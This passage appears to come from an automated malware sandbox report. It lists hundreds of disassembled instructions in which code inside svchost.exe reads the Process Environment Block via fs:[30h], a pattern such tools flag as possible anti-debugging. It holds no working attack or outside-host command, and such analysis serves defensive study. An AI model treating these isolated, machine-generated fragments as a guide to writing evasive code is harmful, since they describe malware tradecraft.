            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC72A0 mov eax, dword ptr fs:[00000030h]2_2_03AC72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov eax, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB92BC mov ecx, dword ptr fs:[00000030h]2_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E284 mov eax, dword ptr fs:[00000030h]2_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB0283 mov eax, dword ptr fs:[00000030h]2_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05283 mov eax, dword ptr fs:[00000030h]2_2_03B05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6329E mov eax, dword ptr fs:[00000030h]2_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED mov eax, dword ptr fs:[00000030h]2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402E1 mov eax, dword ptr fs:[00000030h]2_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B052E2 mov eax, dword ptr fs:[00000030h]2_2_03B052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]2_2_03AEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A292FF mov eax, dword ptr fs:[00000030h]2_2_03A292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]2_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A392C5 mov eax, dword ptr fs:[00000030h]2_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]2_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]2_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05227 mov eax, dword ptr fs:[00000030h]2_2_03B05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2823B mov eax, dword ptr fs:[00000030h]2_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A67208 mov eax, dword ptr fs:[00000030h]2_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34260 mov eax, dword ptr fs:[00000030h]2_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFD26B mov eax, dword ptr fs:[00000030h]2_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2826B mov eax, dword ptr fs:[00000030h]2_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A59274 mov eax, dword ptr fs:[00000030h]2_2_03A59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A71270 mov eax, dword ptr fs:[00000030h]2_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0274 mov eax, dword ptr fs:[00000030h]2_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29240 mov eax, dword ptr fs:[00000030h]2_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov eax, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6724D mov eax, dword ptr fs:[00000030h]2_2_03A6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB256 mov eax, dword ptr fs:[00000030h]2_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE11A4 mov eax, dword ptr fs:[00000030h]2_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]2_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A87190 mov eax, dword ptr fs:[00000030h]2_2_03A87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A551EF mov eax, dword ptr fs:[00000030h]2_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A351ED mov eax, dword ptr fs:[00000030h]2_2_03A351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD71F9 mov esi, dword ptr fs:[00000030h]2_2_03AD71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]2_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]2_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B051CB mov eax, dword ptr fs:[00000030h]2_2_03B051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A31131 mov eax, dword ptr fs:[00000030h]2_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2B136 mov eax, dword ptr fs:[00000030h]2_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F172 mov eax, dword ptr fs:[00000030h]2_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC9179 mov eax, dword ptr fs:[00000030h]2_2_03AC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05152 mov eax, dword ptr fs:[00000030h]2_2_03B05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29148 mov eax, dword ptr fs:[00000030h]2_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37152 mov eax, dword ptr fs:[00000030h]2_2_03A37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D08D mov eax, dword ptr fs:[00000030h]2_2_03A2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A35096 mov eax, dword ptr fs:[00000030h]2_2_03A35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]2_2_03A5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5D090 mov eax, dword ptr fs:[00000030h]2_2_03A5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6909C mov eax, dword ptr fs:[00000030h]2_2_03A6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A550E4 mov eax, dword ptr fs:[00000030h]2_2_03A550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A550E4 mov ecx, dword ptr fs:[00000030h]2_2_03A550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov ecx, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C0 mov eax, dword ptr fs:[00000030h]2_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B050D9 mov eax, dword ptr fs:[00000030h]2_2_03B050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03AAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]2_2_03AAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A590DB mov eax, dword ptr fs:[00000030h]2_2_03A590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
